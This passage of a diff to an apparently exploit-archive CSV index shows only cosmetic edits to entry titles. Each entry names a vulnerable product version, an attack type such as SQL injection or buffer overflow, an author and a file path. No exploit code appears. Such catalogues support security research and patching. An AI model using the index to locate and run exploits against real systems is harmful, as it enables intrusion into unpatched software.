traceon",1998-10-21,Rootshell,irix,remote,0 20806,platforms/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 - Network Printer Administration Interface",2001-04-25,Ltlw0lf,hardware,remote,0 @@ -18302,7 +18304,7 @@ id,file,description,date,author,platform,type,port 21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution",2001-07-12,"Georgi Guninski",windows,remote,0 21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 21006,platforms/windows/dos/21006.txt,"MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 & 5.2.1 - File Scanner Malicious Archive Denial of Service",2001-07-12,"Michel Arboi",windows,dos,0 -21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id parameter'Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 +21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 21008,platforms/cgi/remote/21008.txt,"interactive story 1.3 - Directory Traversal",2001-07-15,qDefense,cgi,remote,0 21009,platforms/windows/remote/21009.c,"ArGoSoft FTP Server 1.2.2.2 - Weak Password Encryption",2001-07-12,byterage,windows,remote,0 21010,platforms/linux/local/21010.sh,"XFree86 X11R6 3.3.2 XMan - ManPath Environment Variable Buffer Overflow",2001-06-11,kf,linux,local,0 @@ -18347,7 +18349,7 @@ id,file,description,date,author,platform,type,port 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection",2012-09-04,L0n3ly-H34rT,php,webapps,0 21056,platforms/php/webapps/21056.txt,"Group Office Calendar - 'calendar/json.php' SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 21057,platforms/windows/remote/21057.txt,"Microsoft IIS 4/5/6 - Internal IP Address/Internal Network Name Disclosure",2001-08-08,"Marek Roy",windows,remote,0 -21058,platforms/solaris/local/21058.c,"Solaris 2.6/7/8 - SPARC xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 +21058,platforms/solaris/local/21058.c,"Solaris 2.6/7/8 -(SPARC) xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 21059,platforms/solaris/local/21059.c,"Solaris 8 - x86 xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 21060,platforms/linux/local/21060.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (1)",2001-08-17,grange,linux,local,0 21061,platforms/linux/local/21061.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (2)",2001-08-17,sd@sf.cz,linux,local,0 @@ -18363,7 +18365,7 @@ id,file,description,date,author,platform,type,port 21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0 21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation",2001-08-15,"Digital Offense",windows,local,0 21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 - Error Message Information Disclosure",2001-08-16,LoWNOISE,unix,local,0 -21074,platforms/unix/dos/21074.pl,"glFTPD 1.x - LIST Denial of Service",2001-08-17,"ASGUARD LABS",unix,dos,0 +21074,platforms/unix/dos/21074.pl,"glFTPd 1.x - 'LIST' Denial of Service",2001-08-17,"ASGUARD LABS",unix,dos,0 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb - Arbitrary Command Execution",2001-08-02,"Maurycy Prodeus ",linux,remote,0 21076,platforms/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 - Weak Password Encryption",2001-08-20,MacSec,osx,local,0 21077,platforms/bsd/dos/21077.c,"BSDI 3.0/3.1 - Possible Local Kernel Denial of Service",2001-08-21,V9,bsd,dos,0 @@ -18444,7 +18446,7 @@ id,file,description,date,author,platform,type,port 21158,platforms/linux/local/21158.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String",2001-11-21,IhaQueR@IRCnet,linux,local,0 21159,platforms/linux/local/21159.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow",2001-11-21,IhaQueR@IRCnet,linux,local,0 21160,platforms/multiple/remote/21160.txt,"ibm informix Web datablade 3.x/4.1 - Directory Traversal",2001-11-22,"Beck Mr.R",multiple,remote,0 -21161,platforms/unix/remote/21161.txt,"Wu-Ftpd 2.6 - File Globbing Heap Corruption",2001-11-27,"Core Security Technologies",unix,remote,0 +21161,platforms/unix/remote/21161.txt,"WU-FTPD 2.6 - File Globbing Heap Corruption",2001-11-27,"Core Security Technologies",unix,remote,0 21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service (1)",2001-11-29,"Alex Hernandez",windows,dos,0 21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service (2)",2001-11-29,"Alex Hernandez",windows,dos,0 21164,platforms/windows/remote/21164.txt,"Microsoft Internet Explorer 5.5/6.0 - Spoofable File Extensions",2001-11-26,StatiC,windows,remote,0 @@ -18505,7 +18507,7 @@ id,file,description,date,author,platform,type,port 21218,platforms/linux/local/21218.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (3)",2002-01-13,anonymous,linux,local,0 21219,platforms/linux/local/21219.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (4)",2002-01-13,"Karol Wiesek",linux,local,0 21220,platforms/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 -21221,platforms/php/webapps/21221.txt,"Joomla RokModule Component - 'index.php module parameter'Blind SQL Injection",2012-09-10,Yarolinux,php,webapps,0 +21221,platforms/php/webapps/21221.txt,"Joomla RokModule Component - 'index.php module parameter' Blind SQL Injection",2012-09-10,Yarolinux,php,webapps,0 21222,platforms/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,php,webapps,0 21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,lin_x86-64,dos,0 21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows - Long Request Buffer Overflow",2002-01-14,aT4r,windows,remote,0 @@ -19098,7 +19100,7 @@ id,file,description,date,author,platform,type,port 21822,platforms/multiple/webapps/21822.txt,"Endpoint Protector 4.0.4.0 - Multiple Vulnerabilities",2012-10-09,Vulnerability-Lab,multiple,webapps,0 21823,platforms/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",windows,dos,0 -21825,platforms/php/webapps/21825.txt,"PHPWebsite 0.8.2 - PHP File Include",2002-09-23,"Tim Vandermeersch",php,webapps,0 +21825,platforms/php/webapps/21825.txt,"phpWebSite 0.8.2 - PHP File Include",2002-09-23,"Tim Vandermeersch",php,webapps,0 21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - SEH Based Buffer Overflow (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0 21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager - Web Interface Cross-Site Scripting",2002-09-23,"Taylor Huff",hardware,remote,0 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0 @@ -19134,7 +19136,7 @@ id,file,description,date,author,platform,type,port 21861,platforms/php/webapps/21861.txt,"DaCode 1.2 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 21862,platforms/php/webapps/21862.txt,"PHP-Nuke 6.0 - modules.php SQL Injection",2002-09-25,"Pedro Inacio",php,webapps,0 21863,platforms/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 -21864,platforms/php/webapps/21864.txt,"PHPWebSite 0.8.3 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 +21864,platforms/php/webapps/21864.txt,"phpWebSite 0.8.3 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 21865,platforms/linux/local/21865.c,"Interbase 5/6 - GDS_Lock_MGR UMask File Permission Changing",2002-09-25,grazer,linux,local,0 21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Persistent Cross-Site Scripting",2012-10-10,loneferret,multiple,webapps,0 21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 @@ -19162,7 +19164,7 @@ id,file,description,date,author,platform,type,port 21896,platforms/php/webapps/21896.txt,"Midicart - PHP Arbitrary File Upload",2002-10-02,frog,php,webapps,0 21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote,0 21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote,0 -21899,platforms/php/webapps/21899.txt,"PHPWebSite 0.8.3 - article.php Cross-Site Scripting",2002-10-02,Sp.IC,php,webapps,0 +21899,platforms/php/webapps/21899.txt,"phpWebSite 0.8.3 - article.php Cross-Site Scripting",2002-10-02,Sp.IC,php,webapps,0 21900,platforms/php/webapps/21900.txt,"MySimpleNews 1.0 - PHP Injection",2002-10-02,frog,php,webapps,0 21901,platforms/php/webapps/21901.txt,"MySimpleNews 1.0 - Remotely Readable Administrator Password",2002-10-02,frog,php,webapps,0 21902,platforms/windows/remote/21902.c,"Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 @@ -19276,7 +19278,7 @@ id,file,description,date,author,platform,type,port 22014,platforms/linux/local/22014.c,"Traceroute-nanog 6 - Local Buffer Overflow",2002-11-12,"Carl Livitt",linux,local,0 22015,platforms/cgi/webapps/22015.txt,"W3Mail 1.0.6 - File Disclosure",2002-11-12,"Tim Brown",cgi,webapps,0 22016,platforms/linux/remote/22016.c,"LibHTTPD 1.2 - POST Buffer Overflow",2002-11-13,Xpl017Elz,linux,remote,0 -22017,platforms/php/webapps/22017.txt,"PHPBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion",2002-11-13,"Hai Nam Luke",php,webapps,0 +22017,platforms/php/webapps/22017.txt,"phpBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion",2002-11-13,"Hai Nam Luke",php,webapps,0 22018,platforms/windows/remote/22018.pl,"keyfocus kf Web server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,windows,remote,0 22019,platforms/windows/dos/22019.pl,"IISPop 1.161/1.181 - Remote Buffer Overflow Denial of Service",2002-11-14,"securma massine",windows,dos,0 22020,platforms/multiple/remote/22020.pl,"Perception LiteServe 2.0 - CGI Source Disclosure",2002-11-14,mattmurphy,multiple,remote,0 @@ -19324,7 +19326,7 @@ id,file,description,date,author,platform,type,port 22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0 22063,platforms/linux/remote/22063.c,"zeroo http server 1.5 - Directory Traversal (1)",2002-11-22,mikecc,linux,remote,0 22064,platforms/linux/remote/22064.pl,"zeroo http server 1.5 - Directory Traversal (2)",2002-11-22,mattmurphy,linux,remote,0 -22065,platforms/php/webapps/22065.html,"PHPBB 2.0.3 - search.php Cross-Site Scripting",2002-12-03,f_a_a,php,webapps,0 +22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 - search.php Cross-Site Scripting",2002-12-03,f_a_a,php,webapps,0 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 @@ -19336,7 +19338,7 @@ id,file,description,date,author,platform,type,port 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final Beta - viewtopic.php Cross-Site Scripting",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 - HTML Injection",2002-11-09,"Dorin Balanica",php,webapps,0 22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 -22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 +22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 22082,platforms/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow",2002-12-10,"Joel Soderberg",windows,remote,0 @@ -19353,7 +19355,7 @@ id,file,description,date,author,platform,type,port 22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/root SQL Injection",2012-10-19,xistence,multiple,remote,0 22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,windows,remote,0 22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 - (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 -22098,platforms/php/webapps/22098.txt,"Joomla Tags - 'index.php tag parameter'SQL Injection",2012-10-19,D4NB4R,php,webapps,0 +22098,platforms/php/webapps/22098.txt,"Joomla Tags - 'index.php tag parameter' SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22099,platforms/php/webapps/22099.txt,"CMSQLite 1.3.2 - Multiple Vulnerabilities",2012-10-19,Vulnerability-Lab,php,webapps,0 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 - say() Format String",2002-12-16,"Marceta Milos",linux,remote,0 @@ -19408,8 +19410,8 @@ id,file,description,date,author,platform,type,port 22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 - modules.php file Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22155,platforms/windows/dos/22155.pl,"Adobe Reader 10.1.4 - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0 22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en - Persistent Cross-Site Scripting",2012-10-22,sqlhacker,php,webapps,0 -22152,platforms/php/webapps/22152.txt,"Joomla Commedia Plugin - 'index.php task parameter'SQL Injection",2012-10-22,D4NB4R,php,webapps,0 -22153,platforms/php/webapps/22153.pl,"Joomla Kunena Component - 'index.php search parameter'SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 +22152,platforms/php/webapps/22152.txt,"Joomla Commedia Plugin - 'index.php task parameter' SQL Injection",2012-10-22,D4NB4R,php,webapps,0 +22153,platforms/php/webapps/22153.pl,"Joomla Kunena Component - 'index.php search parameter' SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0 22156,platforms/php/webapps/22156.txt,"White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0 22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 @@ -19437,7 +19439,7 @@ id,file,description,date,author,platform,type,port 22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0 22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 - Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0 22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - (cs_lang cookie parameter) Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 -22182,platforms/php/webapps/22182.pl,"PHPBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 +22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 22183,platforms/linux/dos/22183.c,"GameSpy 3D 2.62 - Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",linux,dos,0 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0 22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0 @@ -19650,7 +19652,7 @@ id,file,description,date,author,platform,type,port 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting",2012-11-01,"CYBSEC Labs",php,webapps,0 22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",windows,dos,0 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC)",2012-11-01,coolkaveh,windows,dos,0 -22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog - 'index.php product_id parameter'SQL Injection",2012-11-01,D4NB4R,php,webapps,0 +22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog - 'index.php product_id parameter' SQL Injection",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0 22407,platforms/hardware/dos/22407.txt,"Netgear 1.x - ProSafe VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0 @@ -19773,7 +19775,7 @@ id,file,description,date,author,platform,type,port 22526,platforms/windows/remote/22526.rb,"WinRM - VBS Remote Code Execution",2012-11-07,Metasploit,windows,remote,0 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow",2003-04-23,badpack3t,linux,dos,0 22528,platforms/windows/local/22528.c,"Microsoft Windows 2000 - RegEdit.exe Registry Key Value Buffer Overflow",2003-04-09,ThreaT,windows,local,0 -22529,platforms/asp/webapps/22529.txt,"Battleaxe Software BTTLXE Forum - login.asp SQL Injection",2003-04-23,Du|L,asp,webapps,0 +22529,platforms/asp/webapps/22529.txt,"Battleaxe Software BTTLXE Forum - 'login.asp' SQL Injection",2003-04-23,Du|L,asp,webapps,0 22530,platforms/windows/remote/22530.pl,"Microsoft Internet Explorer 5 - Remote URLMON.dll Buffer Overflow",2003-04-23,"Jouko Pynnonen",windows,remote,0 22531,platforms/linux/local/22531.pl,"SAP Database 7.3/7.4 - SDBINST Race Condition",2003-04-23,"Larry W. Cashdollar",linux,local,0 22532,platforms/hardware/remote/22532.txt,"IKE - Aggressive Mode Shared Secret Hash Leakage",1999-10-02,"John Pliam",hardware,remote,0 @@ -19867,7 +19869,7 @@ id,file,description,date,author,platform,type,port 22622,platforms/linux/remote/22622.txt,"WSMP3 0.0.x - Remote Information Disclosure",2003-05-21,"dong-h0un U",linux,remote,0 22623,platforms/linux/remote/22623.txt,"WSMP3 0.0.x - Remote Command Execution",2003-05-21,"dong-h0un U",linux,remote,0 22624,platforms/linux/dos/22624.c,"BZFlag 1.7 g0 - Reconnect Denial of Service",2003-05-21,"russian code molester",linux,dos,0 -22625,platforms/php/webapps/22625.txt,"SudBox Boutique 1.2 - login.php Authentication Bypass",2003-05-21,frog,php,webapps,0 +22625,platforms/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,php,webapps,0 22626,platforms/hardware/remote/22626.txt,"Axis Network Camera 2.x - HTTP Authentication Bypass",2003-05-27,"Juliano Rizzo",hardware,remote,0 22627,platforms/windows/remote/22627.pl,"Qualcomm Eudora 5.2.1/6.0 - File Attachment Spoofing Variant",2003-05-22,"Paul Szabo",windows,remote,0 22628,platforms/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 - LSF_ENVDIR Local Command Execution",2003-03-20,"Tomasz Grabowski",multiple,local,0 @@ -20009,7 +20011,7 @@ id,file,description,date,author,platform,type,port 22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server - File Disclosure",2003-06-13,"Peter Winter-Smith",windows,remote,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 22771,platforms/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6 / Xpdf 0.9x Hyperlinks - Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",linux,remote,0 -22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php question parameter'SQL Injection",2012-11-16,unsuprise,php,webapps,0 +22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php question parameter' SQL Injection",2012-11-16,unsuprise,php,webapps,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps,0 22773,platforms/linux/local/22773.c,"Progress Database 9.1 - Environment Variable Privilege Escalation",2003-06-14,kf,linux,local,0 22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 - Signal Handling Denial of Service",2003-06-14,LynX,windows,dos,0 @@ -20028,7 +20030,7 @@ id,file,description,date,author,platform,type,port 22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - File Upload Remote Code Execution",2012-11-19,Metasploit,windows,remote,0 22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote Username Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 -22790,platforms/windows/dos/22790.txt,"GuildFTPD 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 +22790,platforms/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 - Administrator Plugin options.php Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Exploit",2003-06-17,dr_insane,php,webapps,0 @@ -20102,7 +20104,7 @@ id,file,description,date,author,platform,type,port 22862,platforms/linux/local/22862.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (1)",2003-07-03,ace,linux,local,0 22863,platforms/linux/local/22863.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (2)",2003-07-04,snooq,linux,local,0 22864,platforms/asp/webapps/22864.txt,"ProductCart 1.5/1.6/2.0 - Custva.asp SQL Injection",2003-07-04,Bosen,asp,webapps,0 -22865,platforms/asp/webapps/22865.txt,"ProductCart 1.5/1.6/2.0 - login.asp SQL Injection",2003-07-04,Bosen,asp,webapps,0 +22865,platforms/asp/webapps/22865.txt,"ProductCart 1.5/1.6/2.0 - 'login.asp' SQL Injection",2003-07-04,Bosen,asp,webapps,0 22866,platforms/asp/webapps/22866.txt,"ProductCart 1.5/1.6/2.0 - MSG.asp Cross-Site Scripting",2003-07-05,atomix,asp,webapps,0 22867,platforms/multiple/remote/22867.pl,"Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure",2003-07-05,rs2112,multiple,remote,0 22868,platforms/asp/webapps/22868.txt,"ProductCart 1.5/1.6/2.0 - File Disclosure",2003-07-05,"Tri Huynh",asp,webapps,0 @@ -20207,20 +20209,20 @@ id,file,description,date,author,platform,type,port 23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - fatcat_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 - pagemaster Module PAGE_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22935,platforms/multiple/dos/22935.txt,"Websense Proxy - Filter Bypass",2012-11-26,"Nahuel Grisolia",multiple,dos,0 -22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php idx parameter'SQL Injection",2012-11-26,NoGe,php,webapps,0 +22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php idx parameter' SQL Injection",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps,0 22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",php,webapps,0 -22938,platforms/linux/dos/22938.py,"mcrypt 2.6.8 - stack-based Buffer Overflow (PoC)",2012-11-26,_ishikawa,linux,dos,0 +22938,platforms/linux/dos/22938.py,"mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC)",2012-11-26,_ishikawa,linux,dos,0 22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow",2003-07-21,inv[at]dtors,unix,local,0 22969,platforms/linux/remote/22969.c,"Valve Software Half-Life Server 3.1.1.0 - Multiplayer Request Buffer Overflow",2003-07-29,KnbykL,linux,remote,0 22970,platforms/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 - TCP Window Size Remote Denial of Service",2003-07-29,"Papa loves Mambo",windows,dos,0 22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow",2003-07-29,V9,linux,local,0 22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 - MIME Type Buffer Overflow",2012-11-28,Metasploit,windows,remote,0 -22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 - realpath() Off-by-One Buffer Overflow",2003-08-02,Xpl017Elz,unix,remote,0 +22974,platforms/unix/remote/22974.c,"WU-FTPD 2.6.2 - realpath() Off-by-One Buffer Overflow",2003-08-02,Xpl017Elz,unix,remote,0 23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 - Crash (PoC)",2012-11-29,p3kok,windows,dos,0 -22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2 / 2.6.0 / 2.6.1 - realpath() Off-by-One Buffer Overflow",2003-08-06,Xpl017Elz,unix,remote,0 -22976,platforms/freebsd/remote/22976.pl,"freeBSD 4.8 - realpath() Off-by-One Buffer Overflow",2003-07-31,daniels@legend.co.uk,freebsd,remote,0 +22975,platforms/unix/remote/22975.c,"WU-FTPD 2.6.2 / 2.6.0 / 2.6.1 - realpath() Off-by-One Buffer Overflow",2003-08-06,Xpl017Elz,unix,remote,0 +22976,platforms/freebsd/remote/22976.pl,"FreeBSD 4.8 - realpath() Off-by-One Buffer Overflow",2003-07-31,daniels@legend.co.uk,freebsd,remote,0 22977,platforms/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board - SQL Injection",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps,0 22978,platforms/hardware/dos/22978.txt,"Cisco IOS 10/11/12 - UDP Echo Service Memory Disclosure",2003-08-01,FX,hardware,dos,0 22979,platforms/linux/local/22979.txt,"CDRTools 2.0 - RSCSI Debug File Arbitrary Local File Manipulation",2003-08-01,"Secure Network Operations",linux,local,0 @@ -20261,7 +20263,7 @@ id,file,description,date,author,platform,type,port 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - HTMLtags.php Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - (packages.php id parameter) SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 -23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php menuitem parameter'SQL Injection / Cross-Site 